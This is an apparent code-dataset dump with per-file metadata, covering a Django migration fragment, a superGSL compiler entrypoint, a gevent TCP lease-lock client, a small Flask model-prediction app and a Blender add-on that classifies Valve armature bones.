name='treatment_type',
field=models.ForeignKey(related_name='treatments', to='experiments.TreatmentType'),
),
migrations.AlterField(
model_name='treatmentreplicate',
name='flaw',
field=models.ForeignKey(related_name='treatment_replicates', to='experiments.Flaw', null=True, blank=True),
),
migrations.AlterField(
model_name='treatmentreplicate',
name='treatment',
field=models.ForeignKey(related_name='treatment_replicates', to='experiments.Treatment'),
),
migrations.AlterField(
model_name='treatmenttype',
name='experiment',
field=models.ForeignKey(related_name='treatment_types', to='experiments.Experiment', null=True, blank=True),
),
]
| 44.663551 | 120 | 0.567797 | 835 | 9,558 | 6.353293 | 0.129341 | 0.049199 | 0.051461 | 0.038454 | 0.661828 | 0.654854 | 0.552309 | 0.446937 | 0.411687 | 0.380584 | 0 | 0.008137 | 0.292844 | 9,558 | 213 | 121 | 44.873239 | 0.776742 | 0 | 0 | 0.628571 | 0 | 0 | 0.198054 | 0.035886 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.004762 | 0 | 0.019048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e8d831dc9c908bff516eb0907d8dffbcd80011f | 2,023 | py | Python | supergsl/sgsl.py | rmcl/supergsl | d0851ab1e2201a30ff0e8862c56fc302a686117d | [
"MIT"
] | 1 | 2021-09-09T00:15:37.000Z | 2021-09-09T00:15:37.000Z | supergsl/sgsl.py | rmcl/supergsl | d0851ab1e2201a30ff0e8862c56fc302a686117d | [
"MIT"
] | 43 | 2020-11-08T23:40:23.000Z | 2022-03-26T23:44:33.000Z | supergsl/sgsl.py | rmcl/supergsl | d0851ab1e2201a30ff0e8862c56fc302a686117d | [
"MIT"
] | null | null | null | """Entrypoint for the `sgsl` command used to invoke the superGSL compiler."""
import argparse
from supergsl.core.config import load_settings
from supergsl.core.pipeline import CompilerPipeline
from supergsl.core.exception import SuperGSLError
from supergsl.repl import SuperGSLShell
from supergsl.grpc.server import SuperGSLCompilerService
import pprint
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"input_file",
help="The input source code file to process",
type=str,
default=None,
nargs='?')
parser.add_argument(
"-l", "--listen",
help="Start up a gRPC server.",
default=False,
action='store_true')
parser.add_argument(
"-D", "--start-shell-on-error",
help="If an error occurs during execution of SuperGSL program then start the repl shell.",
default=False,
action='store_true')
parser.add_argument(
"-s", "--settings",
help="Provide the path to a supergsl-config.json file.",
default=None,
nargs='+')
args = parser.parse_args()
compiler_settings = load_settings(args.settings)
if args.listen:
print('Starting gRPC compiler server.')
service = SuperGSLCompilerService(compiler_settings)
service.start_listening()
print('Stoping compiler server')
return
compiler_pipeline = CompilerPipeline(compiler_settings)
if not args.input_file:
SuperGSLShell(compiler_pipeline).start()
else:
print('Compiling "%s".' % args.input_file)
with open(args.input_file, 'r') as input_file_fp:
source_code = input_file_fp.read()
try:
compiler_pipeline.compile(source_code)
except SuperGSLError as error:
if args.start_shell_on_error:
SuperGSLShell(compiler_pipeline).start()
else:
raise error
print('Compiling Complete.')
if __name__ == "__main__":
main()
| 28.097222 | 98 | 0.648047 | 227 | 2,023 | 5.60793 | 0.405286 | 0.042419 | 0.053417 | 0.036135 | 0.12883 | 0.069128 | 0.069128 | 0.069128 | 0 | 0 | 0 | 0 | 0.254572 | 2,023 | 71 | 99 | 28.492958 | 0.844164 | 0.035096 | 0 | 0.254545 | 0 | 0 | 0.18705 | 0.011305 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018182 | false | 0 | 0.127273 | 0 | 0.163636 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e8e52b76f7627d2e5926d3d4072f9f0f9c25bb5 | 4,592 | py | Python | usher/tcp_client.py | lukecampbell/usher | f939c6ba3ccfdd265306cbf4752a890021473c0e | [
"Apache-2.0"
] | 1 | 2019-07-24T21:20:48.000Z | 2019-07-24T21:20:48.000Z | usher/tcp_client.py | lukecampbell/usher | f939c6ba3ccfdd265306cbf4752a890021473c0e | [
"Apache-2.0"
] | null | null | null | usher/tcp_client.py | lukecampbell/usher | f939c6ba3ccfdd265306cbf4752a890021473c0e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
from usher.tcp_server import MessageParser
from struct import pack, unpack
import socket
import gevent.event
import gevent
import time
class UsherSocket(socket.socket):
'''
A socket wrapper that can be used in a context-manager
'''
def __init__(self, host, port):
socket.socket.__init__(self, socket.AF_INET, socket.SOCK_STREAM)
self.connect((host,port))
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
class UsherTCPClient:
'''
The usher TCP Client
'''
def __init__(self, host, port, timeout=10, server_blocking=False, server_timeout=0):
self.host = host
self.port = port
self.timeout = timeout
self.server_blocking=server_blocking
self.server_timeout = server_timeout
# Make sure the server is alive
self.nop()
def acquire_lease(self, namespace, expiration=60, server_timeout=0):
'''
Acquire a lease
returns the expiration time or 0 on failure
'''
server_timeout = server_timeout or self.server_timeout
with UsherSocket(self.host, self.port) as s, gevent.timeout.Timeout(self.timeout):
mp = MessageParser(s)
if self.server_blocking:
mp.send_acquire(namespace, expiration, self.server_timeout)
else:
mp.send_acquire(namespace, expiration, 0)
status, key = mp.read_acquire_response()
return status, key
def release_lease(self, namespace, key):
'''
Release a lease
returns 0 on success
'''
with UsherSocket(self.host, self.port) as s, gevent.timeout.Timeout(self.timeout):
mp = MessageParser(s)
mp.send_release(namespace, key)
status = mp.read_release_response()
return status
def nop(self):
'''
Send a NOP message
returns 0 on reply
'''
with UsherSocket(self.host, self.port) as s, gevent.timeout.Timeout(self.timeout):
mp = MessageParser(s)
mp.send_nop()
status = mp.read_nop_response()
return status
def rtt(self):
'''
Determines round trip time (RTT) using a NOP
'''
then = time.time()
self.nop()
now = time.time()
return now - then
class UsherLock:
'''
A distributed lock
Usage:
usher = UsherTCPClient('localhost', 9090)
lock = UsherLock(usher)
with lock:
do_something()
'''
def __init__(self, cli, name, blocking=True, timeout=10, acquisition_timeout=10, raise_timeout=True):
'''
Initialize an UsherLock
cli - The UsherTCPClient
name - The namespace for this lock
blocking - Should the lock block while acquiring the lock or fail immediately
timeout - How long to acquire the lock for
acquisition_timeout - How long to wait on the server
raise_timeout - Should a timeout be raised
'''
self.cli = cli
self.name = name
self.blocking = blocking
self.timeout = timeout
self.acquisition_timeout = acquisition_timeout
self.raise_timeout = raise_timeout
self.gevent_timeout = gevent.timeout.Timeout(self.timeout)
self.key = None
def acquire(self):
'''
Acquire the lock
raises Timeout
'''
expiration, self.key = self.cli.acquire_lease(self.name, self.timeout)
if expiration != 0:
return True
if self.blocking:
done = gevent.event.Event()
with gevent.timeout.Timeout(self.acquisition_timeout):
while not done.wait(1):
expiration, self.key = self.cli.acquire_lease(self.name, self.timeout)
if expiration != 0:
done.set()
return True
return False
def release(self):
if self.key:
r = self.cli.release_lease(self.name, self.key)
if r == 0:
raise RuntimeError("Couldn't release the lock")
def __enter__(self):
if not self.acquire():
raise RuntimeError("Couldn't acquire the lock")
if self.raise_timeout:
self.gevent_timeout.start()
return self
def __exit__(self, type, value, traceback):
self.release()
self.gevent_timeout.cancel()
| 28.7 | 105 | 0.586237 | 527 | 4,592 | 4.963947 | 0.244782 | 0.046254 | 0.048165 | 0.045872 | 0.282875 | 0.182339 | 0.182339 | 0.182339 | 0.182339 | 0.149465 | 0 | 0.007129 | 0.327962 | 4,592 | 159 | 106 | 28.880503 | 0.84057 | 0.179443 | 0 | 0.27907 | 0 | 0 | 0.01436 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.151163 | false | 0 | 0.069767 | 0.011628 | 0.360465 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e8ee0c246e72a0e714983f025577bd8e93cdeab | 860 | py | Python | app.py | mukesh1996-ds/Logistic-Regression- | cd564203923a2d0d042c13345924617114c6bc74 | [
"MIT"
] | 1 | 2022-01-12T08:22:12.000Z | 2022-01-12T08:22:12.000Z | app.py | mukesh1996-ds/Logistic-Regression- | cd564203923a2d0d042c13345924617114c6bc74 | [
"MIT"
] | null | null | null | app.py | mukesh1996-ds/Logistic-Regression- | cd564203923a2d0d042c13345924617114c6bc74 | [
"MIT"
] | null | null | null |
# importing necessary libraries and functions
import numpy as np
from flask import Flask, request, jsonify, render_template
import pickle
app = Flask(__name__) #Initialize the flask App
model = pickle.load(open('Logistic.pickle', 'rb')) # loading the trained model
@app.route('/') # Homepage
def home():
return render_template('index.html')
@app.route('/predict',methods=['POST'])
def predict():
'''
For rendering results on HTML GUI
'''
# retrieving values from form
init_features = [float(x) for x in request.form.values()]
final_features = [np.array(init_features)]
prediction = model.predict(final_features) # making prediction
return render_template('index.html', prediction_text='Predicted Class: {}'.format(prediction)) # rendering the predicted result
if __name__ == "__main__":
app.run(debug=True) | 28.666667 | 131 | 0.712791 | 109 | 860 | 5.440367 | 0.587156 | 0.070826 | 0.067454 | 0.084317 | 0.097808 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165116 | 860 | 30 | 132 | 28.666667 | 0.825905 | 0.248837 | 0 | 0 | 0 | 0 | 0.1232 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.1875 | 0.0625 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e8f89e3acee541134ba922492d88302691c6512 | 130,823 | py | Python | utils.py | kant/valve-armature-toolkit | c7e82de5db6b98af44cd8cddc64b7ca99c96e589 | [
"MIT"
] | null | null | null | utils.py | kant/valve-armature-toolkit | c7e82de5db6b98af44cd8cddc64b7ca99c96e589 | [
"MIT"
] | null | null | null | utils.py | kant/valve-armature-toolkit | c7e82de5db6b98af44cd8cddc64b7ca99c96e589 | [
"MIT"
] | null | null | null | import bpy
from math import radians
from bpy.app.handlers import persistent
from . import armature_rename
from .armature_creation import armature
class Prefixes: #Container for other prefixes
helper = 'hlp_'
helper2 = 'ValveBiped.hlp_'
attachment = 'ValveBiped.attachment_'
attachment2 = 'ValveBiped.Anim_'
other = 'ValveBiped.'
##Helper prefixes##
#h1 = hlp_
#h2 = ValveBiped.hlp_
##Attachment prefixes##
#a1 = ValveBiped.attachment
#a2 = ValveBiped.Anim
##Bone prefixes##
#p1 = Current prefix
#p2 = ValveBiped.
@persistent
def create_armature(self, context): #Creates new armature class
vatproperties = bpy.context.scene.vatproperties
vatinfo = bpy.context.scene.vatinfo
if vatinfo.creating_armature:
vatinfo.creating_armature = False
if vatproperties.target_armature:
if vatinfo.armature_name != vatproperties.target_armature.name:
vatinfo.armature_name = ''
vatinfo.unit = 0
global arm
arm = Armature(vatproperties.target_armature)
vatinfo.armature_name = vatproperties.target_armature.name
else:
vatinfo.armature_name = ''
@persistent
def armatures_reset(*args):
vatproperties = bpy.context.scene.vatproperties
vatinfo = bpy.context.scene.vatinfo
if vatinfo.armature_name:
vatproperties.target_armature = bpy.data.objects[vatinfo.armature_name]
class Armature: #Armature base
def __init__(self, armature):
vatinfo = bpy.context.scene.vatinfo
#Basic armature information
self.armature = armature
self.armature_real = armature.data
#Additional armatures
self.weight_armature = None
self.weight_armature_real = None
self.animation_armature = None
self.animation_armature_real = None
#Functions executed to gather armature information
if vatinfo.armature_name:
self.get_bones(False)
else:
self.get_bones(True)
if vatinfo.scheme != -1:
self.get_unit()
self.get_armatures()
self.get_constraints()
self.set_groups()
if self.helper_bones:
self.set_helper_bones()
else:
print("Empty armature, cannot proceed")
def get_bones(self, report): #Builds bone lists
vatproperties = bpy.context.scene.vatproperties
vatinfo = bpy.context.scene.vatinfo
armature = self.armature
if self.armature:
#Cleans bone list
self.full_bonelist = []
self.symmetrical_bones = {'arms': {'clavicle': [], 'upperarm': [], 'forearm': [], 'hand': []}, 'legs': {'thigh': [], 'calf': [], 'foot': [], 'toe0': []}, 'fingers': {'finger0': [], 'finger01': [], 'finger02': [], 'finger1': [], 'finger11': [], 'finger12': [], 'finger2': [], 'finger21': [], 'finger22': [], 'finger3': [], 'finger31': [], 'finger32': [], 'finger4': [], 'finger41': [], 'finger42': []}}
self.central_bones = {'pelvis': [], 'spine': [], 'spine1': [], 'spine2': [], 'spine3': [], 'spine4': [], 'neck': [], 'head': []}
self.helper_bones = {'arms': {'trapezius': [], 'shoulder': [], 'bicep': [], 'elbow': [], 'ulna': [], 'wrist': []}, 'legs': {'quadricep': [], 'knee': []}, 'viewmodel': {'thumbroot': [], 'thumbfix': [], 'wrist_helper1': [], 'wrist_helper2': [], 'forearm_driven': [], 'ulna_extra1': [], 'ulna_extra2': [], 'wrist_extra': []}, 'others': {'others': []}}
self.other_bones = {'forward': [], 'weapon': [], 'attachment': [], 'viewmodel': [], 'root': [], 'others': []}
self.custom_bones = {'jiggle': [], 'others': []}
self.full_bonelist = armature.data.bones.keys() #Gets all bones in armature
#Checks if bone list is empty
if self.full_bonelist:
symmetrical_bones_raw = []
central_bones_raw = []
helper_bones_raw = []
other_bones_raw = []
custom_bones_raw = []
self.side = []
helper_bones = []
central_bones = []
vatinfo.prefix = ''
vatinfo.sbox = False
vatinfo.goldsource = False
vatinfo.titanfall = False
vatinfo.sfm
vatinfo.viewmodel = False
vatinfo.special_viewmodel = False
for bone in self.full_bonelist:
marked = False
#Helper prefix
if bone.startswith('hlp_'):
helper_bones_raw.append(bone.replace(Prefixes.helper, 'h1'))
continue
##Source##
elif bone.startswith('ValveBiped.'):
if not vatinfo.special_viewmodel:
vatinfo.prefix = 'ValveBiped.Bip01_'
self.side = ['L_', 'R_', '_L', '_R']
helper_bones = ['ulna', 'wrist', 'elbow', 'knee', 'trapezius', 'quad', 'bicep', 'shoulder', 'thumbroot']
central_bones = []
#Dumb leftover bone with no purpose in some Titanfall armatures
if vatinfo.titanfall:
self.custom_bones['others'].append('p2.' + bone.replace('ValveBiped.', ''))
continue
#L4D2 helper prefix, uses 'h2' prefix
if bone.startswith('ValveBiped.hlp_'):
helper_bones_raw.append(bone.replace('ValveBiped.hlp_', 'h2.'))
continue
#Attachment bone prefixes
elif bone.startswith('ValveBiped.attachment'):
other_bones_raw.append(bone.replace('ValveBiped.attachment_', 'a1.'))
continue
elif bone.startswith('ValveBiped.Anim'):
other_bones_raw.append(bone.replace('ValveBiped.Anim_', 'a2.'))
continue
elif bone == 'ValveBiped.ValveBiped':
vatinfo.viewmodel = True
self.other_bones['root'].append(bone.replace(Prefixes.other, 'p2.'))
continue
elif bone == 'ValveBiped.bip_root' or bone == 'ValveBiped.bip_base':
vatinfo.prefix = 'ValveBiped.bip_'
vatinfo.viewmodel = True
vatinfo.special_viewmodel = True
self.other_bones['root'].append(bone.replace(vatinfo.prefix, 'p1.'))
continue
##Source Filmmaker (Not supported currently)##
elif bone.startswith('bip_') and not vatinfo.special_viewmodel:
vatinfo.sfm = True
vatinfo.prefix = 'bip_'
##Gold Source##
elif bone.title().startswith('Bip0') or bone.count('Bone') or bone.count('Dummy'):
vatinfo.goldsource = True
self.side = [' L ', ' R ', ' L', ' R']
helper_bones = []
central_bones = []
if bone.title().startswith('Bip01'):
vatinfo.prefix = 'Bip01'
elif bone.title().startswith('Bip02'):
vatinfo.prefix = 'Bip02'
if bone == vatinfo.prefix:
self.other_bones['root'].append(bone)
continue
##S&Box##
elif vatinfo.sbox or self.full_bonelist.count('root_IK'):
vatinfo.sbox = True
vatinfo.prefix = ''
self.side = ['L_', 'R_', '_L', '_R']
helper_bones = ['twist', 'helper']
central_bones = ['pelvis', 'spine_0', 'spine_1', 'spine_2', 'neck_0', 'head']
if bone.casefold().count('ik'):
other_bones_raw.append(bone)
continue
elif bone.casefold().count('face') or bone.casefold().count('eye'):
custom_bones_raw.append(bone)
continue
##Titanfall##
elif bone.startswith('def') or bone.startswith('ja') or bone.startswith('jx'):
vatinfo.titanfall = True
vatinfo.prefix = 'def_'
self.side = ['L_', 'R_', '_L', '_R']
helper_bones = ['forearm', 'elbowb', 'kneeb', 'shouldermid', 'shouldertwist']
central_bones = []
#Root bone
if bone == 'jx_c_delta':
self.other_bones['root'].append(bone)
continue
#Attachments/#Special bones
elif bone.startswith('ja') or bone.startswith('jx'):
other_bones_raw.append(bone)
continue
else:
self.side = ['L_', 'R_', '_L', '_R']
#Central bone set if defined
if central_bones:
for central in central_bones:
if bone.casefold().count(central):
if vatinfo.prefix:
central_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
else:
central_bones_raw.append(bone)
marked = True
break
#Helper bone set
if helper_bones:
for helper in helper_bones:
if bone.casefold().count(helper):
if vatinfo.prefix:
helper_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
else:
helper_bones_raw.append(bone)
marked = True
break
if marked:
continue
if bone.startswith(vatinfo.prefix) or vatinfo.special_viewmodel:
bone2 = bone.replace(vatinfo.prefix, '').title()
if bone.casefold().count('weapon') or bone.casefold().count('gun') or bone.casefold().count('missile'):
if vatinfo.prefix:
other_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
else:
other_bones_raw.append(bone)
continue
#Default prefix
elif bone2.startswith(self.side[0]) or bone2.startswith(self.side[1]): #Symmetrical
vatinfo.scheme = 0
if vatinfo.prefix:
symmetrical_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
else:
symmetrical_bones_raw.append(bone)
continue
#Blender Friendly prefix
elif bone2.endswith(self.side[2]) or bone2.endswith(self.side[3]):
vatinfo.scheme = 1
if vatinfo.prefix:
symmetrical_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
else:
symmetrical_bones_raw.append(bone)
continue
elif vatinfo.prefix:
central_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
continue
if bone.startswith(Prefixes.other):
other_bones_raw.append(bone.replace(Prefixes.other, 'p2.'))
continue
##No/Different prefix##
custom_bones_raw.append(bone)
#Empty armature
if not symmetrical_bones_raw and not central_bones_raw and not self.other_bones:
vatinfo.scheme = -1
###Organizes dictionary from raw lists###
##Symmetrical bones##
if symmetrical_bones_raw:
#Bone list order:
#arms = clavicle, upperarm, forearm, hand
#legs = thigh, calf, foot, toe0
#fingers = finger0, finger01, finger02, finger1, finger11...
for bone in symmetrical_bones_raw:
#L4D special infected viewmodel
if vatinfo.special_viewmodel:
arms = ['Collar', 'Upperarm', 'Lowerarm', 'Hand']
legs = []
fingers = ['thumb_0', 'thumb_1', 'thumb_2', 'index_0', 'index_1', 'index_2', 'middle_0', 'middle_1', 'middle_2', 'ring_0', 'ring_1', 'ring_2', 'pinky_0', 'pinky_1', 'pinky_2']
#Gold Source
elif vatinfo.goldsource:
arms = ['Arm', 'Arm1', 'Arm2', 'Hand']
legs = ['Leg', 'Leg1', 'Foot', None]
fingers = ['Finger0', 'Finger01', 'Finger02', 'Finger1', 'Finger11', 'Finger12', 'Finger2', 'Finger21', 'Finger22', 'Finger3', 'Finger31', 'Finger32', 'Finger4', 'Finger41', 'Finger42']
if bone.title().count('Toe'):
if bone.title().count('Toe02'):
self.symmetrical_bones['legs'].setdefault('toe02', [])
self.symmetrical_bones['legs']['toe02'].append(bone)
self.symmetrical_bones['legs']['toe02'].sort()
continue
elif bone.title().count('Toe01'):
self.symmetrical_bones['legs'].setdefault('toe01', [])
self.symmetrical_bones['legs']['toe01'].append(bone)
self.symmetrical_bones['legs']['toe01'].sort()
continue
elif bone.title().count('Toe12'):
self.symmetrical_bones['legs'].setdefault('toe12', [])
self.symmetrical_bones['legs']['toe12'].append(bone)
self.symmetrical_bones['legs']['toe12'].sort()
continue
elif bone.title().count('Toe11'):
self.symmetrical_bones['legs'].setdefault('toe11', [])
self.symmetrical_bones['legs']['toe11'].append(bone)
self.symmetrical_bones['legs']['toe11'].sort()
continue
elif bone.title().count('Toe1'):
self.symmetrical_bones['legs'].setdefault('toe1', [])
self.symmetrical_bones['legs']['toe1'].append(bone)
self.symmetrical_bones['legs']['toe1'].sort()
continue
#Titanfall
elif vatinfo.titanfall:
arms = ['Clav', 'Shoulder', 'Elbow', 'Wrist']
legs = ['Thigh', 'Knee', 'Ankle', 'Ball']
fingers = ['finThumbA', 'finThumbB', 'finThumbC', 'finIndexA', 'finIndexB', 'finIndexC', 'finMidA', 'finMidB', 'finMidC', 'finRingA', 'finRingB', 'finRingC', 'finPinkyA', 'finPinkyB', 'finPinkyC']
if bone.count('Carpal'):
self.symmetrical_bones['fingers'].setdefault('fingercarpal', [])
self.symmetrical_bones['fingers']['fingercarpal'].append(bone)
self.symmetrical_bones['fingers']['fingercarpal'].sort()
continue
elif bone.count('thighLow'):
self.symmetrical_bones['legs'].setdefault('thighlow', [])
self.symmetrical_bones['legs']['thighlow'].append(bone)
self.symmetrical_bones['legs']['thighlow'].sort()
continue
elif bone.count('hip'):
self.symmetrical_bones['legs'].setdefault('hip', [])
self.symmetrical_bones['legs']['hip'].append(bone)
self.symmetrical_bones['legs']['hip'].sort()
continue
#Sbox
elif vatinfo.sbox:
arms = ['Clavicle', 'Arm_Upper', 'Arm_Lower', 'Hand']
legs = ['Leg_Upper', 'Leg_Lower', 'Ankle', 'Ball']
fingers = ['thumb_0', 'thumb_1', 'thumb_2', 'finger_index_0', 'finger_index_1', 'finger_index_2', 'finger_middle_0', 'finger_middle_1', 'finger_middle_2', 'finger_ring_0', 'finger_ring_1', 'finger_ring_2', None, None, None,]
if bone.title().count('Hold'):
self.other_bones['attachment'].append(bone)
self.other_bones['attachment'].sort()
continue
elif bone.count('finger_index_meta'):
self.symmetrical_bones['fingers'].setdefault('indexmeta', [])
self.symmetrical_bones['fingers']['indexmeta'].append(bone)
self.symmetrical_bones['fingers']['indexmeta'].sort()
continue
elif bone.count('finger_middle_meta'):
self.symmetrical_bones['fingers'].setdefault('middlemeta', [])
self.symmetrical_bones['fingers']['middlemeta'].append(bone)
self.symmetrical_bones['fingers']['middlemeta'].sort()
continue
elif bone.count('finger_ring_meta'):
self.symmetrical_bones['fingers'].setdefault('ringmeta', [])
self.symmetrical_bones['fingers']['ringmeta'].append(bone)
self.symmetrical_bones['fingers']['ringmeta'].sort()
continue
#Source
else:
arms = ['Clavicle', 'Upperarm', 'Forearm', 'Hand']
legs = ['Thigh', 'Calf', 'Foot', 'Toe0']
fingers = ['Finger0', 'Finger01', 'Finger02', 'Finger1', 'Finger11', 'Finger12', 'Finger2', 'Finger21', 'Finger22', 'Finger3', 'Finger31', 'Finger32', 'Finger4', 'Finger41', 'Finger42']
if bone.title().count('Forearm_Driven'):
self.helper_bones['viewmodel']['forearm_driven'].append(bone)
self.helper_bones['viewmodel']['forearm_driven'].sort()
continue
#Inversed due to how some armatures deal with bone names ('Arm, Arm1' for example)
if arms:
if arms[3]:
if bone.title().count(arms[3]):
self.symmetrical_bones['arms']['hand'].append(bone)
self.symmetrical_bones['arms']['hand'].sort()
continue
if arms[2]:
if bone.title().count(arms[2]):
self.symmetrical_bones['arms']['forearm'].append(bone)
self.symmetrical_bones['arms']['forearm'].sort()
continue
if arms[1]:
if bone.title().count(arms[1]):
self.symmetrical_bones['arms']['upperarm'].append(bone)
self.symmetrical_bones['arms']['upperarm'].sort()
continue
if arms[0]:
if bone.title().count(arms[0]):
self.symmetrical_bones['arms']['clavicle'].append(bone)
self.symmetrical_bones['arms']['clavicle'].sort()
continue
if legs:
if legs[3]:
if bone.title().count(legs[3]):
self.symmetrical_bones['legs']['toe0'].append(bone)
self.symmetrical_bones['legs']['toe0'].sort()
continue
if legs[2]:
if bone.title().count(legs[2]):
self.symmetrical_bones['legs']['foot'].append(bone)
self.symmetrical_bones['legs']['foot'].sort()
continue
if legs[1]:
if bone.title().count(legs[1]):
self.symmetrical_bones['legs']['calf'].append(bone)
self.symmetrical_bones['legs']['calf'].sort()
continue
if legs[0]:
if bone.title().count(legs[0]):
self.symmetrical_bones['legs']['thigh'].append(bone)
self.symmetrical_bones['legs']['thigh'].sort()
continue
if fingers:
if fingers[2]:
if bone.count(fingers[2]):
self.symmetrical_bones['fingers']['finger02'].append(bone)
self.symmetrical_bones['fingers']['finger02'].sort()
continue
if fingers[1]:
if bone.count(fingers[1]):
self.symmetrical_bones['fingers']['finger01'].append(bone)
self.symmetrical_bones['fingers']['finger01'].sort()
continue
if fingers[0]:
if bone.count(fingers[0]):
self.symmetrical_bones['fingers']['finger0'].append(bone)
self.symmetrical_bones['fingers']['finger0'].sort()
continue
if fingers[5]:
if bone.count(fingers[5]):
self.symmetrical_bones['fingers']['finger12'].append(bone)
self.symmetrical_bones['fingers']['finger12'].sort()
continue
if fingers[4]:
if bone.count(fingers[4]):
self.symmetrical_bones['fingers']['finger11'].append(bone)
self.symmetrical_bones['fingers']['finger11'].sort()
continue
if fingers[3]:
if bone.count(fingers[3]):
self.symmetrical_bones['fingers']['finger1'].append(bone)
self.symmetrical_bones['fingers']['finger1'].sort()
continue
if fingers[8]:
if bone.count(fingers[8]):
self.symmetrical_bones['fingers']['finger22'].append(bone)
self.symmetrical_bones['fingers']['finger22'].sort()
continue
if fingers[7]:
if bone.count(fingers[7]):
self.symmetrical_bones['fingers']['finger21'].append(bone)
self.symmetrical_bones['fingers']['finger21'].sort()
continue
if fingers[6]:
if bone.count(fingers[6]):
self.symmetrical_bones['fingers']['finger2'].append(bone)
self.symmetrical_bones['fingers']['finger2'].sort()
continue
if fingers[11]:
if bone.count(fingers[11]):
self.symmetrical_bones['fingers']['finger32'].append(bone)
self.symmetrical_bones['fingers']['finger32'].sort()
continue
if fingers[10]:
if bone.count(fingers[10]):
self.symmetrical_bones['fingers']['finger31'].append(bone)
self.symmetrical_bones['fingers']['finger31'].sort()
continue
if fingers[9]:
if bone.count(fingers[9]):
self.symmetrical_bones['fingers']['finger3'].append(bone)
self.symmetrical_bones['fingers']['finger3'].sort()
continue
if fingers[14]:
if bone.count(fingers[14]):
self.symmetrical_bones['fingers']['finger42'].append(bone)
self.symmetrical_bones['fingers']['finger42'].sort()
continue
if fingers[13]:
if bone.count(fingers[13]):
self.symmetrical_bones['fingers']['finger41'].append(bone)
self.symmetrical_bones['fingers']['finger41'].sort()
continue
if fingers[12]:
if bone.count(fingers[12]):
self.symmetrical_bones['fingers']['finger4'].append(bone)
self.symmetrical_bones['fingers']['finger4'].sort()
continue
custom_bones_raw.append(bone)
##Central bone##
if central_bones_raw:
#Bone list order:
#spines = pelvis, spine, spine1, spine2, spine3, spine4
#head = neck, head
for bone in central_bones_raw:
if vatinfo.special_viewmodel:
spines = [None, None, None, None, 'Spine_2', 'Spine_3']
head = []
elif vatinfo.goldsource:
spines = ['Pelvis', 'Spine', 'Spine1', 'Spine2', 'Spine3', 'Spine4']
head = ['Neck', 'Head']
elif vatinfo.titanfall:
spines = ['Hip', 'Spinea', 'Spineb', 'Spinec', None, None]
head = ['Neck', 'Head']
if bone.title().count('Neckb'):
self.central_bones.setdefault('neck2', [])
self.central_bones['neck2'].append(bone)
self.central_bones['neck2'].sort()
continue
elif vatinfo.sbox:
spines = ['Pelvis', 'Spine_0', 'Spine_1', 'Spine_2', None, None]
head = ['Neck_0', 'Head']
else:
spines = ['Pelvis', 'Spine', 'Spine1', 'Spine2', 'Spine3', 'Spine4']
head = ['Neck', 'Head']
if spines:
if spines[0]:
if bone.title().count(spines[0]):
self.central_bones['pelvis'].append(bone)
self.central_bones['pelvis'].sort()
continue
if spines[5]:
if bone.title().count(spines[5]):
self.central_bones['spine4'].append(bone)
self.central_bones['spine4'].sort()
continue
if spines[4]:
if bone.title().count(spines[4]):
self.central_bones['spine3'].append(bone)
self.central_bones['spine3'].sort()
continue
if spines[3]:
if bone.title().count(spines[3]):
self.central_bones['spine2'].append(bone)
self.central_bones['spine2'].sort()
continue
if spines[2]:
if bone.title().count(spines[2]):
self.central_bones['spine1'].append(bone)
self.central_bones['spine1'].sort()
continue
if spines[1]:
if bone.title().count(spines[1]):
self.central_bones['spine'].append(bone)
self.central_bones['spine'].sort()
continue
if head:
if head[1]:
if bone.title().count(head[1]):
self.central_bones['head'].append(bone)
self.central_bones['head'].sort()
continue
if head[0]:
if bone.title().count(head[0]):
self.central_bones['neck'].append(bone)
self.central_bones['neck'].sort()
continue
self.custom_bones.setdefault(bone.casefold(), [])
self.custom_bones[bone.casefold()].append(bone)
self.custom_bones[bone.casefold()].sort()
##Helper bones##
if helper_bones_raw:
for bone in helper_bones_raw:
#Bone list order:
#arms = Trapezius, Shoulder, Bicep, Elbow, Ulna, Wrist
#legs = Quadricep, Knee
#Additional bone set only in viewmodels that need a separate container to avoid messing with wrist generation
if vatinfo.viewmodel:
if bone.title().count('Ulna01'):
self.helper_bones['viewmodel']['ulna_extra1'].append(bone)
self.helper_bones['viewmodel']['ulna_extra1'].sort()
continue
elif bone.title().count('Ulna02'):
self.helper_bones['viewmodel']['ulna_extra2'].append(bone)
self.helper_bones['viewmodel']['ulna_extra2'].sort()
continue
